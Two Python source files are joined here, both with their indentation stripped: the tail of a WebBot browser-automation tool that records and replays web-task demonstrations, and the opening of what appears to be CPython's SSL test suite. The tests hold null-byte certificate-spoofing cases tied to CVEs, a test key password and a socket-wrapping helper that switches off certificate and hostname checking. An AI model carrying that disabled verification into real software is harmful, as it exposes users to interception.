if target_locator == last_output_ele:
lines_parsed.append(line)
last_output_ele = None
else:
last_output_ele = target_locator
if action_type != Action.INPUT_TEXT and action_type != Action.FINISH:
lines_parsed.append(line)
last_line, last_action_type, last_target_locator = line, action_type, target_locator
else:
self.logger.warning("parse_action_lines failed: %s" % line)
if last_action_type == Action.INPUT_TEXT:
lines_parsed.append(last_line)
filtered_action_lines = []
for i, action_line in enumerate(lines_parsed):
if i > 0:
m = re.match(ACTION_RE, action_line)
action_type, value, target_locator = m.group(1), m.group(2), m.group(3)
if action_type == Action.INPUT_TEXT:
last_action_line = filtered_action_lines[-1]
m = re.match(ACTION_RE, last_action_line)
last_action_type, last_value, last_target_locator = m.group(1), m.group(2), m.group(3)
if last_action_type == Action.CLICK and last_target_locator == target_locator:
filtered_action_lines.pop(len(filtered_action_lines) - 1)
filtered_action_lines.append(action_line)
return filtered_action_lines
log_lines = []
self.browser.get_log()
while True:
try:
for log_line in self.browser.get_log():
print("Action captured: ", log_line)
if log_line in [ACTION_DEMO_SAVE, ACTION_DEMO_CURRENT, ACTION_DEMO_NEXT, ACTION_DEMO_QUIT]:
return log_line, parse_action_lines(log_lines)
else:
log_lines.append(log_line)
if self.browser.driver.current_window_handle != self.browser.driver.window_handles[-1]:
self.browser.driver.switch_to.window(self.browser.driver.window_handles[-1])
self.browser._execute_script("window.ylController.listenActions();")
time.sleep(0.5)
except Exception:
pass
def demonstrate(self, output_dir=None, save_utg=False, skip_existing=True, verify_after_demo=True):
self.browser.start_log_server()
for task in self.tasks:
if skip_existing and os.path.exists(os.path.join(output_dir, task.name + "task.json")):
continue
while True:
self.reset(new_task=task)
print("Demonstrating task %s: %s" % (task.name, task.task_str))
print("\t%s: \tSave the demonstration of current task" % ACTION_DEMO_SAVE)
print("\t%s: \tRe-demonstrate current task" % ACTION_DEMO_CURRENT)
print("\t%s: \tDemonstrate next task" % ACTION_DEMO_NEXT)
print("\t%s: \tQuit demonstration" % ACTION_DEMO_QUIT)
print("\tDouble click: \tSelect output")
demo_control, action_lines = self._listen_actions()
if demo_control in [ACTION_DEMO_SAVE]:
task.demonstration = action_lines
task.target_url = task.state.url
task.save(output_dir, save_utg=save_utg, as_demo=True)
if verify_after_demo:
print("verifying the demonstration by replaying ...")
reply_succeeded = self._replay_actions(task, action_lines=action_lines)
if reply_succeeded:
print("replay succeeded")
continue
elif demo_control in [ACTION_DEMO_CURRENT]:
continue
elif demo_control in [ACTION_DEMO_NEXT, ACTION_DEMO_QUIT]:
break
else:
self.logger.warning("Unknown demo_control: " + demo_control)
if demo_control in [ACTION_DEMO_QUIT]:
break
self.browser.stop_log_server()
self.logger.info("Done demonstrating tasks.")
def _replay_actions(self, task, action_lines):
success = True
try:
self.reset(new_task=task)
except Exception as e:
self.logger.error("replay failed during resetting: %s" % e)
traceback.print_exc()
return False
for line in action_lines:
try:
self.render()
m = re.match(ACTION_RE, line)
action_type, value, target_locator = m.group(1), m.group(2), m.group(3)
target_ele = task.state.get_element_by_locator(target_locator)
action = Action(element=target_ele, action_type=action_type, value=value)
state, reward, done = self.step(action)
self.logger.info("\tReplay, action:%s, %s" % (action, task.get_reward_str()))
except Exception as e:
self.logger.error("replay failed during executing %s: %s" % (line, e))
success = False
traceback.print_exc()
continue
if state is None:
success = False
task.target_state_str = task.state.state_str
self.logger.info("final url is %s" % task.state.url)
return success
def analyze_task_complexity(self, task, action_lines):
success = True
try:
self.reset(new_task=task)
except Exception as e:
self.logger.error("replay failed during resetting: %s" % e)
traceback.print_exc()
return False
num_actions_list = []
num_sim_actions_list = []
num_inputs_list = []
num_words_list = []
num_elements_list = []
set_urls = set()
from form_agent import FormManager
for line in action_lines + [None]:
try:
self.render()
state = task.state
if not isinstance(state, State):
continue
words = state.text.split()
num_words_list.append(len(words))
num_actions_list.append(len(state.possible_actions))
num_sim_actions_list.append(len(task.get_preferred_actions()))
num_elements_list.append(len(state.elements_in_window))
input_candidates = FormManager.extract_input_candidates(task)
num_inputs_list.append(len(input_candidates))
set_urls.add(state.url)
if line is None:
continue
m = re.match(ACTION_RE, line)
action_type, value, target_locator = m.group(1), m.group(2), m.group(3)
target_ele = task.state.get_element_by_locator(target_locator)
action = Action(element=target_ele, action_type=action_type, value=value)
state, reward, done = self.step(action)
self.logger.info("\tReplay, action:%s, %s" % (action, task.get_reward_str()))
except Exception as e:
self.logger.error("replay failed during executing %s: %s" % (line, e))
success = False
traceback.print_exc()
continue
if state is None:
success = False
num_actions = np.mean(num_actions_list)
num_sim_actions = np.mean(num_sim_actions_list)
num_elements = np.mean(num_elements_list)
num_inputs = np.mean(num_inputs_list)
num_words = np.mean(num_words_list)
num_pages = len(set_urls)
num_demo_steps = len(action_lines)
num_demo_click_steps = len([line for line in action_lines if line.startswith('click')])
num_demo_input_steps = len([line for line in action_lines if line.startswith('input_text') or line.startswith('select')])
num_parameters = len(task.parameter_ids)
num_task_words = len(task.query_words)
task.target_state_str = task.state.state_str
self.logger.info("final url is %s" % task.state.url)
success_tag = 'Y' if success else 'N'
self.logger.info("Task complexity head task_name "
"num_actions num_sim_actions num_inputs num_words num_elements "
"num_pages num_demo_steps num_demo_click_steps num_demo_input_steps "
"num_parameters num_task_words success_tag")
self.logger.info(f"Task complexity row {task.name} "
f"{num_actions} {num_sim_actions} {num_inputs} {num_words} {num_elements} "
f"{num_pages} {num_demo_steps} {num_demo_click_steps} {num_demo_input_steps} "
f"{num_parameters} {num_task_words} {success_tag}")
return success
def _generalize(self, task, action_lines):
# TODO implement this
replay_success = self._replay_actions(task, action_lines)
if not replay_success:
return False
state_explored_action_lines = {}
state_effective_actions = {}
def is_fully_explored():
for state_str in state_explored_action_lines:
tried_actions = state_explored_action_lines[state_str]
for action_line in action_lines:
if action_line not in tried_actions:
return False
return True
def get_unexplored_action(state):
for action_line in action_lines:
if action_line in state_explored_action_lines[state.state_str]:
continue
state_explored_action_lines[state.state_str].add(action_line)
m = re.match(ACTION_RE, action_line)
action_type, value, target_locator = m.group(1), m.group(2), m.group(3)
element = state.get_element_by_locator(target_locator)
if element:
return Action(element=element, action_type=action_type, value=value)
return None
while not is_fully_explored():
self.reset(new_task=task)
while True:
if task.state.state_str not in state_explored_action_lines:
state_explored_action_lines[task.state.state_str] = set()
if task.state.state_str not in state_effective_actions:
state_effective_actions[task.state.state_str] = set()
action = get_unexplored_action(task.state)
if not action:
action = random.choice(state_effective_actions[task.state.state_str])
state, reward, done = self.step(action=action)
if state:
state_effective_actions[task.state.state_str].add(action)
self.logger.info("\tGeneralize, action:%s, reward:%.2f, done:%s" %
(action, task.reward, task.done))
return True
def replay(self, replay_source=None):
for task in self.tasks:
self.logger.info("Replaying task: %s" % task.task_str)
if replay_source == "demonstration" or replay_source is None:
action_lines = task.demonstration
elif replay_source == "history":
action_lines = task.action_history
else:
action_lines = replay_source
if action_lines:
reply_succeeded = self._replay_actions(task, action_lines=action_lines)
if reply_succeeded:
self.logger.info("Done replaying, total_reward %.2f" % task.total_reward)
else:
self.logger.warning("Cannot replay task: %s" % task.task_str)
def post_process(self, task, tasklet):
self.logger.info("Postprocessing tasklet:\n%s" % tasklet)
original_replay_trace = Task.get_replay_trace_from_tasklet(tasklet)
original_reward = Task.get_total_reward_from_tasklet(tasklet)
original_tasklet = tasklet
replay_trace = copy.copy(original_replay_trace)
self._replay_actions(task, replay_trace)
if original_reward is None:
original_reward = task.total_reward
original_final_screen = task.state.screenshot
# try remove negative-reward actions
negative_reward_actions = []
if len(task.action_history) == len(task.reward_history):
for i, action in enumerate(task.action_history):
action_reward = task.reward_history[i][0]
if i == len(replay_trace) and action.is_submit:
continue
if action_reward <= 0:
negative_reward_actions.append(action)
for action in negative_reward_actions:
new_replay_trace = copy.copy(replay_trace)
if action.replay_api not in new_replay_trace:
continue
new_replay_trace.remove(action.replay_api)
self.logger.info("checking whether action is removable: %s" % action)
replay_success = self._replay_actions(task, new_replay_trace)
if replay_success and task.total_reward >= original_reward:
# this action is removable
self.logger.info("removable: %s" % action)
replay_trace = new_replay_trace
else:
# this action is not removable
self.logger.info("not removable: %s" % action)
if len(negative_reward_actions) > 0:
self._replay_actions(task, replay_trace)
# try append form submission action
if len(task.action_history) > 0:
last_action = task.action_history[-1]
form_submit_action = None
if last_action.element and last_action.element.parent_form and not last_action.is_submit:
form_submit_action = last_action.element.parent_form.form_submit_action
if form_submit_action:
self.logger.info("append action: %s" % form_submit_action)
replay_trace.append(form_submit_action.replay_api)
elif last_action.action_type == Action.INPUT_TEXT:
press_enter_action = Action(last_action.element, Action.PRESS_ENTER, "")
self.logger.info("append action: %s" % press_enter_action)
replay_trace.append(press_enter_action.replay_api)
self._replay_actions(task, replay_trace)
if task.total_reward >= original_reward:
final_screen = task.state.screenshot
return task.get_tasklet(), task.total_reward, final_screen
else:
return original_tasklet, original_reward, original_final_screen
def destroy(self):
if self.canvas:
self.canvas.destroy()
def parse_args():
"""
Parse command line input
:return:
"""
parser = argparse.ArgumentParser(description="Start WebBot to test websites.")
# Task definitions
parser.add_argument("-start_url", action="store", dest="start_url", default=None,
help="The url to start with, ex. https://www.google.com/.")
parser.add_argument("-query", action="store", dest="query", default="",
help="The task query, ex. \"search\"")
parser.add_argument("-parameter", action="append", dest="parameters", default=[],
help="The parameter key:value pair, ex. \"word:microsoft\"")
parser.add_argument("-included_url_re", action="append", dest="included_url_res", default=[],
help="Stop (fail) current episode if the url doesn't match any included_url_re")
parser.add_argument("-target_url_re", action="append", dest="target_url_res", default=[],
help="Stop (success) current episode if the url matches all target_url_re")
parser.add_argument("-target_text_re", action="append", dest="target_text_res", default=[],
help="Stop (success) current episode if the text matches all target_text_re")
parser.add_argument("-task_path", action="store", dest="task_path", default=None,
help="Path to *task.json file or directory.")
# Browser settings
parser.add_argument("-wait", action="store", dest="wait", type=float, default=0.1,
help="Minimum time to wait after each action, in seconds.")
parser.add_argument("-proxy", action="store", dest="proxy", type=str, default=None,
help="IP:PORT proxy to use.")
parser.add_argument("-mobile", action="store_true", dest="mobile", default=False,
help="Test in mobile mode.")
parser.add_argument("-headless", action="store_true", dest="headless", default=False,
help="Run browser in headless mode (do not start browser GUI).")
parser.add_argument("-extension_path", action="store", dest="extension_path", default=None,
help="Path to extension .crx file. Run browser with a predefined extension installed."
"It does not work if headless is set to True.")
# Environment settings
parser.add_argument("-demonstrate", action="store_true", dest="demonstrate", default=False,
help="Demonstrate the tasks.")
parser.add_argument("-replay", action="store", dest="replay_source", default=None,
help="Replay the tasks. Argument value can be \"demonstration\" or \"history\"")
parser.add_argument("-explore", action="store_true", dest="explore", default=False,
help="Explore the tasks.")
parser.add_argument("-visualize", action="store_true", dest="visualize", default=False,
help="Visualize state transitions.")
parser.add_argument("-output_dir", action="store", dest="output_dir", default=None,
help="The directory to save utg.")
parser.add_argument("-save_utg", action="store_true", dest="save_utg", default=False,
help="Save the UI transition graph and states.")
args, unknown = parser.parse_known_args()
return args
def main():
logging.basicConfig(level=logging.INFO, format="%(asctime)s %(name)-12s %(levelname)-8s %(message)s")
args = parse_args()
print(args)
arg_browser = ChromeBrowser(
wait=args.wait,
proxy=args.proxy,
mobile=args.mobile,
headless=args.headless,
extension_path = args.extension_path
)
tasks = []
if args.start_url:
arg_task = Task(
start_url=args.start_url,
included_url_res=args.included_url_res,
target_url_res=args.target_url_res,
target_text_res=args.target_text_res,
query_words=args.query.split()
)
tasks.append(arg_task)
tasks.extend(Task.load_tasks(args.task_path))
if args.save_utg and args.output_dir:
for task in tasks:
task.utg.states_dir = os.path.join(args.output_dir, "states")
# cache_browser = CacheBrowser(
# utgs=[task.utg for task in tasks]
# )
arg_env = WebBotEnv(
tasks=tasks,
browser=arg_browser,
visualize=args.visualize
)
if args.demonstrate:
arg_env.demonstrate(output_dir=args.output_dir, save_utg=args.save_utg)
if args.replay_source:
arg_env.replay(replay_source=args.replay_source)
if args.explore:
arg_env.explore(output_dir=args.output_dir, save_utg=args.save_utg)
if __name__ == "__main__":
main()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import sysconfig
import functools
try:
import ctypes
except ImportError:
ctypes = None
ssl = support.import_module("ssl")
from ssl import TLSVersion, _TLSContentType, _TLSMessageType
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1_0 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
IS_OPENSSL_1_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 1)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Jul 7 14:23:16 2028 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def has_tls_protocol(protocol):
"""Check if a TLS protocol is available and enabled
:param protocol: enum ssl._SSLMethod member or name
:return: bool
"""
if isinstance(protocol, str):
assert protocol.startswith('PROTOCOL_')
protocol = getattr(ssl, protocol, None)
if protocol is None:
return False
if protocol in {
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER,
ssl.PROTOCOL_TLS_CLIENT
}:
# auto-negotiate protocols are always available
return True
name = protocol.name
return has_tls_version(name[len('PROTOCOL_'):])
@functools.lru_cache
def has_tls_version(version):
"""Check if a TLS/SSL version is enabled
:param version: TLS version name or ssl.TLSVersion member
:return: bool
"""
if version == "SSLv2":
# never supported and not even in TLSVersion enum
return False
if isinstance(version, str):
version = ssl.TLSVersion.__members__[version]
# check compile time flags like ssl.HAS_TLSv1_2
if not getattr(ssl, f'HAS_{version.name}'):
return False
# check runtime and dynamic crypto policy settings. A TLS version may
# be compiled in but disabled by a policy or config option.
ctx = ssl.SSLContext()
if (
hasattr(ctx, 'minimum_version') and
ctx.minimum_version != ssl.TLSVersion.MINIMUM_SUPPORTED and
version < ctx.minimum_version
):
return False
if (
hasattr(ctx, 'maximum_version') and
ctx.maximum_version != ssl.TLSVersion.MAXIMUM_SUPPORTED and
version > ctx.maximum_version
):
return False
return True
def requires_tls_version(version):
"""Decorator to skip tests when a required TLS version is not available
:param version: TLS version name or ssl.TLSVersion member
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if not has_tls_version(version):
raise unittest.SkipTest(f"{version} is not available.")
else:
return func(*args, **kw)
return wrapper
return decorator
requires_minimum_version = unittest.skipUnless(
hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL >= 1.1.0g"
)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def _have_secp_curves():
if not ssl.HAS_ECDH:
return False
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
ctx.set_ecdh_curve("secp384r1")
except ValueError:
return False
else:
return True
HAVE_SECP_CURVES = _have_secp_curves()
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
maxDiff = None
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 4.0
self.assertLess(n, 0x40000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 1)
self.assertLess(major, 4)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
